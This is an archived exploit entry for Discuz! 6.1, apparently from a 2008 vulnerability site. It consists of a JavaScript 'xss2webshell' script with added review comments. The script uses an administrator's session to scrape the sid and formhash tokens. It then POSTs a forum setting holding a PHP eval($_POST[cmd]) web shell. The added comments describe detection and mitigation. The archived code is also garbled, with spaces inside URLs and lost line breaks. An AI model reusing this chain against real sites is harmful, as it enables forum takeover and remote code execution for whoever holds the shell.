Discuz! 6.1 xss2webshell Exploit-vulnerability warning-the black bar safety net

2008-11-28T00:00:00
ID MYHACK58:62200821244
Type myhack58
Reporter 佚名
Modified 2008-11-28T00:00:00

Description

/*

#######################################

Discuz! 6.1 xss2webshell [SODB-2008-10] Exploit by 80vul-A team: http://www.80vul.com

#######################################

*/ //Target url var siteurl='http://www.80vul.com/Discuz_6.1.0/';

// Archived listing: the line breaks of the original script were lost in
// extraction, so each step below sits on one physical line. The archived
// text is kept byte-for-byte; only review comments are added around it.
//
// Builds the XMLHttpRequest used by every request in this chain: the native
// XMLHttpRequest (calling overrideMimeType when available) or, on older IE,
// an ActiveX ProgID. Failed ActiveXObject constructors are swallowed by the
// empty catch and the loop never breaks on success, so the LAST ProgID that
// instantiates wins, not the first. The result is assigned to the undeclared
// global `xmlhttp` (a ReferenceError under strict mode / ES modules).
// NOTE(review): the ProgID strings contain a space after each dot
// ('Microsoft. XMLHTTP'); this looks like an artifact of the archived text.
var request = false; if(window. XMLHttpRequest) { request = new XMLHttpRequest(); if(request. overrideMimeType) { request. overrideMimeType('text/xml'); } } else if(window. ActiveXObject) { var versions = ['Microsoft. XMLHTTP', 'MSXML. XMLHTTP', 'Microsoft. XMLHTTP', 'Msxml2. XMLHTTP. 7. 0','Msxml2. XMLHTTP. 6. 0','Msxml2. XMLHTTP. 5. 0', 'Msxml2. XMLHTTP. 4. 0', 'MSXML2. XMLHTTP. 3. 0', 'MSXML2. XMLHTTP']; for(var i=0; i<versions. length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } xmlhttp=request;

// Step 1. As archived, this whole line is a `//` comment because the line
// break after "//Get the sid" was lost. It is a synchronous GET to the admin
// panel (admincp.php?frames=yes) followed by a regex over the response that
// captures the admin session id (`sid`). It only succeeds when the browser
// already holds an authenticated admin session, i.e. the script is executing
// with the administrator's cookies — the XSS-to-admin pivot the title refers
// to. When the regex does not match (not logged in) nothing further happens.
// `siteurl` is declared on the preceding line, which is likewise inside a
// comment in the archived text.
//Get the sid xmlhttp. open("GET", siteurl+"admincp. php? frames=yes", false); //firefox3 can't use xmlhttp. send(); http://hi.baidu.com/aullik5/blog/item/fd0648fa4ef44762034f564e.html //thx luoluo@ph4nt0m.org xmlhttp. send(null); var echo = xmlhttp. responseText; var reg = /action=home&sid=([\w\d]+)\" /i; var arr=reg. exec(echo); if(! arr){ //Does not log in the background //alert(document. cookie); }else{ var sid=arr[1]; }

// Step 2 (also entirely commented out in the archive): GET
// admincp.php?action=home&sid=<sid> and extract the `formhash` form token
// from the page body. window.onerror is installed just before `arr[1]` is
// read, presumably to suppress the uncaught error when the regex found no
// match (arr is null). Defender note: a form token that script running in
// the admin's origin can read from the DOM does not protect against an XSS
// in that origin; it only defends against cross-origin (CSRF) requests.
//Get the formhash xmlhttp. open("GET", siteurl+"admincp. php? action=home&sid="+sid, false); xmlhttp. send(null); var echo = xmlhttp. responseText; var reg = / name=\"formhash\" value=\"([\w\d]+)\"/i; var arr=reg. exec(echo); window. onerror=function(){return true;} var formhash=arr[1]; //alert(formhash);

// Step 3 (also entirely commented out in the archive): a synchronous
// form-encoded POST to admincp.php?action=runwizard&step=3 carrying the sid
// and formhash obtained above, with the settingsnew[bbname] value set to PHP
// code (an eval of a request parameter). The referenced SODB-2008-10 advisory
// presumably covers how that setting ends up in a file executed as PHP; this
// listing itself does not show that part.
// Detection: an admin session issuing GET admincp.php?frames=yes and, moments
// later, a POST to action=runwizard whose settings values contain a PHP open
// tag is the signature of this chain. Mitigation: validate/escape settings
// before persisting them into anything PHP-executable, and keep admin-side
// pages free of user-controlled content so sid and formhash are not readable
// by injected script.
// NOTE(review): `& amp;` inside the body and the spaces in the URL strings
// are archive artifacts; the text is kept as-is.
//By the SODB-2 0 0 8-1 0 write webshell //http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt xmlhttp. open("POST", siteurl+"admincp. php? action=runwizard&step=3", false); xmlhttp. setRequestHeader("Referer", siteurl); xmlhttp. setRequestHeader("Content-Type","application/x-www-form-urlencoded"); xmlhttp. send(unescape("settingsnew%5Bbbname%5D=%3C%3F@eval($_POST[cmd])%3A%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.& amp;settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww. comsenz. com%2F&step2submit=+%CF%C2%D2%BB%B2%BD+&formhash="+formhash));